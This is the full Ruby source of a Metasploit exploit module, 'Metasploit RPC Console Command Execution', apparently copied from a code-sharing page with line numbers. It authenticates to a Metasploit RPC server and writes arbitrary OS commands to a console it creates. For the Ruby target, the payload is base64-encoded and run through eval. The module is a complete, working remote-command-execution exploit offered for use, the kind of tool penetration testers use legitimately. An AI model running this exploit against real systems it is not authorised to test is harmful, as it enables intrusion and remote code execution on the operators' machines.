Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::Tcp
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'            => 'Metasploit RPC Console Command Execution',
15
      'Description'     => %q{
16
        This module connects to a specified Metasploit RPC server and
17
        uses the 'console.write' procedure to execute operating
18
        system commands. Valid credentials are required to access the
19
        RPC interface.
20

21
        This module has been tested successfully on Metasploit 4.15
22
        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
23
        4.14 on Windows 7 SP1.
24
      },
25
      'License'        => MSF_LICENSE,
26
      'Author'         => 'bcoles',
27
      'References'     =>
28
        [
29
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
30
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
31
        ],
32
      'Platform'       => %w{ ruby unix win },
33
      'Targets'        => [
34
          [ 'Ruby',        { 'Arch'     => ARCH_RUBY,
35
                             'Platform' => 'ruby',
36
                             'Payload'  => { 'BadChars' => "\x00" } } ],
37
          [ 'Windows CMD', { 'Arch'     => ARCH_CMD,
38
                             'Platform' => 'win',
39
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],
40
          [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,
41
                             'Platform' => 'unix',
42
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]
43
        ],
44
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
45
      'Privileged'     => false,
46
      'DisclosureDate' => '2011-05-22',
47
      'DefaultTarget'  => 0))
48
    register_options [ Opt::RPORT(55552),
49
                       OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
50
                       OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
51
                       OptBool.new('SSL', [ true, 'Use SSL', true]) ]
52
  end
53

54
  def execute_command(cmd, opts = {})
55
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
56

57
    if res.nil?
58
      fail_with Failure::Unknown, 'Connection failed'
59
    end
60

61
    unless res['wrote'].to_s =~ /\A\d+\z/
62
      print_error "Could not write to console #{@console_id}:"
63
      print_line res.to_s
64
      return
65
    end
66

67
    vprint_good "Wrote #{res['wrote']} bytes to console"
68
  end
69

70
  def exploit
71
    begin
72
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
73
    rescue Rex::ConnectionRefused => e
74
      fail_with Failure::Unreachable, 'Connection refused'
75
    rescue => e
76
      fail_with Failure::Unknown, "Connection failed: #{e}"
77
    end
78

79
    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
80

81
    if @rpc.token.nil?
82
      fail_with Failure::NoAccess, 'Authentication failed'
83
    end
84

85
    print_good 'Authenticated successfully'
86
    vprint_status "Received temporary token: #{@rpc.token}"
87

88
    version = @rpc.call 'core.version'
89

90
    if res.nil?
91
      fail_with Failure::Unknown, 'Connection failed'
92
    end
93

94
    print_status "Metasploit #{version['version']}"
95
    print_status "Ruby #{version['ruby']}"
96
    print_status "API version #{version['api']}"
97

98
    vprint_status 'Creating new console...'
99
    res = @rpc.call 'console.create'
100

101
    if res.nil?
102
      fail_with Failure::Unknown, 'Connection failed'
103
    end
104

105
    unless res['id'].to_s =~ /\A\d+\z/
106
      print_error 'Could not create console:'
107
      print_line res.to_s
108
      return
109
    end
110

111
    @console_id = res['id']
112
    print_good "Created console ##{@console_id}"
113

114
    print_status 'Sending payload...'
115

116
    case target['Platform']
117
    when 'ruby'
118
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
119
    when 'win'
120
      cmd = payload.encoded
121
    when 'unix'
122
      cmd = payload.encoded
123
    else
124
      fail_with Failure::NoTarget, 'Invalid target'
125
    end
126

127
    execute_command cmd
128
  end
129

130
  def cleanup
131
    return if @console_id.nil?
132

133
    vprint_status 'Removing console...'
134
    res = @rpc.call 'console.destroy', @console_id
135

136
    if res.nil?
137
      print_error 'Connection failed'
138
      return
139
    end
140

141
    unless res['result'].eql? 'success'
142
      print_warning "Could not destroy console ##{@console_id}:"
143
      print_line res.to_s
144
      return
145
    end
146

147
    vprint_good "Destroyed console ##{@console_id}"
148
  ensure
149
    @rpc.close
150
  end
151
end
152

153